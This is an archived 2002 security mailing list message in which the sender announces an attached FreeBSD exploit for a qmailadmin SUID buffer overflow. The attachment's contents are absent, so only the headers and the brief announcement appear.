[26563] in bugtraq
Re: qmailadmin SUID buffer overflow
daemon@ATHENA.MIT.EDU (badc0ded)
Tue Aug 6 18:18:32 2002
Message-ID: <20020806205329.14838.qmail@securityfocus.com>
Date: Wed, 24 Jul 2002 23:05:04 GMT
From: badc0ded <badc0ded@badc0ded.com>
To: vuln-dev@securityfoucs.com
Reply-To: badc0ded@badc0ded.com
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="spruceJKTGZCPYHKNUTSTQPMFG"
--spruceJKTGZCPYHKNUTSTQPMFG
Content-Type: text/plain
Content-Transfer-Type: 8bit
Had nothing better to do today so attached is a FreeBSD qmailadmin exploit.
It is really ugly but does the trick. Wasn't quite bored enough to make a
pretty one, sorry :)
--spruceJKTGZCPYHKNUTSTQPMFG
Content-Type: application/octet-stream; name="qmailadmin-exp.c"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="qmailadmin-exp.c"
--spruceJKTGZCPYHKNUTSTQPMFG--